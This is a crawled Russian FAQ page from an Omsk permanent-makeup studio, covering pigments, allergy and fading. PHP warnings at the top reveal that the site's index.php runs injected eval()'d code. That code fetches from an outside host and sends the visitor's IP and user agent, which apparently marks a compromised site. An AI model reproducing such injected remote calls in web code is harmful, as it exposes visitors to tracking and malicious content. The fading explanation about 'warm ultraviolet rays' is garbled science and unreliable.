Warning: file_get_contents() [function.file-get-contents]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/host1231867/tatuag-omsk.ru/htdocs/www/index.php(3) : eval()'d code on line 1

Warning: file_get_contents(http://edisfuncpill.ru/get.php?d=tatuag-omsk.ru%2Findex.php%2F2012-03-09-12-34-30&u=CCBot%2F2.0+%28http%3A%2F%2Fcommoncrawl.org%2Ffaq%2F%29&c=UTF-8&i=1&ip=54.225.26.154&h=24925db4b29218a0949b8591883dbcc5) [function.file-get-contents]: failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/host1231867/tatuag-omsk.ru/htdocs/www/index.php(3) : eval()'d code on line 1

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/host1231867/tatuag-omsk.ru/htdocs/www/index.php(3) : eval()'d code:1) in /home/host1231867/tatuag-omsk.ru/htdocs/www/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/host1231867/tatuag-omsk.ru/htdocs/www/index.php(3) : eval()'d code:1) in /home/host1231867/tatuag-omsk.ru/htdocs/www/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/host1231867/tatuag-omsk.ru/htdocs/www/index.php(3) : eval()'d code:1) in /home/host1231867/tatuag-omsk.ru/htdocs/www/libraries/joomla/session/session.php on line 426
Часто возникающие вопросы
     
Логотип компании СТРЕКОЗА Как с нами связаться?!
 
 

Часто возникающие вопросы
Добавить вопрос

Показывать по    Всего вопросов - 5
Почему меняется цвет пигмента?

В зависимости от процентного содержания жидких компонентов краски принято подразделять на водно-спиртовые и глицериновые. Узнать каким средством пользуется мастер, можно, внимательно ознакомившись с этикеткой, где основные компоненты указаны по степени убывания. С водно-спиртовыми красками работать сложнее, они слишком быстро высыхают и поэтому менее экономичны. К тому же они в силу жидкой консистенции  могут попасть в более глубокие слои кожи, заметно меняя свой оттенок. По этим причинам водно-спиртовыми красками пользуются главным образом для татуировок на теле. Кремовые краски проникают не так глубоко, поэтому обеспечивают цвет более яркий чем водно –спиртовые.

ГАММА цветов для перманентного макияжа включает до 300 оттенков! Существуют специальные таблицы, которые могут дать представление о том, как будет выглядеть та или иная краска, внедренная под кожу. Кроме того, перманентный макияж не является «вечным памятником красоте»; он постепенно блекнет и через некоторое время уже требует коррекции. Загадки природы……с тела татуировка не сходит в течении жизни, а на лице держится относительно недолго в зависимости от особенностей кожи.

Есть и внешние факторы, в силу которых цвет перманентного макияжа может измениться — ультрафиолетовые лучи, пилинг, дермабразия и пр.

Надо знать, что цвет перманентного макияжа трансформируется не только под воздействием времени и внешних агентов. Вначале, еще в процессе нанесения, выглядит темнее, поскольку смешивается с лимфатической жидкостью и кровью. Затем на месте нанесения макияжа появляется корочка, которая по мере заживления отпадает. После этого оттенок становится более блеклым. Поскольку мы воспринимаем его через новый слой эпителия.

Кроме того, у кожи имеется собственный характер, который непременно нужно знать и уважать. Он тоже влияет на особенности оттенка.

Например, мастер должен учитывать, что слой эпителия может быть разным даже в пределах небольшого участка лица, поэтому дозу вводимой краски нужно тщательно выверять, чтобы получилась максимально равномерная линия. Иногда перепады цвета становятся настолько очевидны, что приходится проводить повторную процедуру для выравнивания цвета.

Чем темнее собственный оттенок кожи, тем дольше будет держаться перманент. Здесь определенную роль играет то, что темная кожа интенсивно выделяет меланин, и выцветание краски менее заметно.. Тонкая светлая кожа меньше искажает первоначальный тон краски, но здесь краситель сходит гораздо быстрее. Толстая светлая кожа делает краску более блеклой. При перманентном макияже обнаруживаются преимущества возраста….чем старше клиент, тем дольше сохраняется макияж, поскольку с возрастом интенсивность обновления клеток снижается.

Вам помогла эта информация? Да Нет
Что такое пигменты?!

Пигменты состоят из: красящего вещества (, умбра, сиенна, охра, ультрамарин, сажа и др.) и основы, в которой красящее вещество гомогенизировано (жиры, спирт, сорбитол, вода).

Пигменты, используемые для процедур микродермапигментации, должны отвечать следующим требованиям:

  1. Красители не должны содержать токсичные и канцерогенные компоненты. Показатель РН пигмента должен находиться в пределах физиологической нормы. Следует обратить внимание на то, что пигменты для татуировки на теле довольно часто имеют щелочной или кислый показатель РН. Контакт такого пигмента со слизистыми оболочками опасен.
  2. Красящее вещество должно быть нерастворимо в воде и компонентах основы красителя. В случае если это требование не выполняется, красящее вещество будет распределяться в коже по градиенту концентрации, то есть «растекаться» Как проверить? По контуру капли пигмента на листке бумаги остается небольшой след растворителя. Этот след не должен быть окрашенным.
  3. Размер частиц красителя должен быть одинаковым (однородность, гомогенность). Как проверить? Если капля красителя, высыхая, образует однородную, ровную поверхность — пигмент однородный. Если на поверхности засохшей капли есть «комочки» - пигмент гетерогенный, неоднородный. Неоднородность пигмента может значительно затруднять работу мастера, и влиять на качество распределения пигмента в коже.
  4. . Качественные красители со временем равномерно светлеют, без значительного изменения оттенка цвета. В случае же применения некачественных пигментов можно получить малиновые брови или даже зеленые, синие или сиреневые губы.

Для женщин ведущих активный образ жизни становится идеальным вариантом выглядеть ежеминутно идеальной .Сегодня этот вариант макияжа используется не только для насыщения цветом и придания выразительности лицу но и для коррекции ассиметрии губ, бровей, век а также для изменения возвратных изменений.

Вам помогла эта информация? Да Нет
Может ли быть аллергическая реакция на пигмент?

Любой пигмент состоит из собственно красителя, воды, спирта и ингридиентов придающих ему требуемые свойства по впитываемости, равномерности, распределению в коже. К таким ингридиентам относится глицерин, сорбитол и некоторые другие вещества. Качественные фирменные пигменты высокоочищенные, не имеют посторонних примесей, красители в них могут быть или органические или минеральные; используются также оксиды металлов. Однако никаких компонентов растительного или животного происхождения не применяется и шанс на аллергическую реакцию сведен к минимуму. В перманентном же макияже происходит имплантация пигмента в верхний слой кожи и имунная система воспринимает его как инородное тело.

Вам помогла эта информация? Да Нет
Сколько держится татуаж?

Специально разработаны пигменты, которые постепенно блекнут, и по прошествии 1–3лет клиентка решает: повторить ей татуаж тем же цветом и в том же объеме, либо что-нибудь изменить.

Дело в том, что в любом пигменте находится смесь различных красителей присутствующих в нем в определенной пропорции. И хотим мы этого или нет, эта пропорция с годами меняется, так как различные красители выводятся иммунной системой организма с разной скоростью. В итоге меняется и цвет пигмента. Наступает момент, когда необходимо произвести корректирующую процедуру. Срок коррекции индивидуален, так как у каждого свои особенности иммунной системы. Делается это для того чтобы носитель перманента мог сменить форму, цвет или размер, ведь как известно, человек со временем меняется, меняет свой стиль одежды, прическу, манеру поведения и конечно макияж.

Вам помогла эта информация? Да Нет
Почему татуаж бледнеет?

Человеческая кожа воспринимает татуировочный пигмент или пигмент для перманентного макияжа (татуажа) как инородное тело. И пытается избавиться от него. Клетки макрофаги поглощают пигмент и погибают, создавая собой капсулу, вокруг всей поверхности пигмента. Одной из особенностей этой капсулы является то, что она не пропускает ультрафиолетовые лучи теплой гаммы. В этом случае человеческий глаз видит отражение лучей только холодного спектра. Поэтому, черный пигмент татуировки после заживления раневой поверхности, начинает выглядеть «Синим». Цвет пигмента в слое кожи не меняется, просто глаз видит только те лучи спектра, которые отражает капсула, то есть отражение лучей холодного спектра — «Синие».

Вам помогла эта информация? Да Нет
 

ЗАПИСАТЬСЯ НА ПРИЕМ

 

НОВОСТИ И АКЦИИ:

С 1 Марта 2013 года

Приглашаем Всех Вас в наш салон который находиться по адресу г.Омск ул.Харьковская 23 Цокольный этаж вход со стороны ул.Кирова!

Требуются модели на все виды оказываемых услуг! Цена от 50 руб.


Дизай и создание сайта Addamant
© 2012 г. Все права защищены. Татуаж-студия "Стрекоза"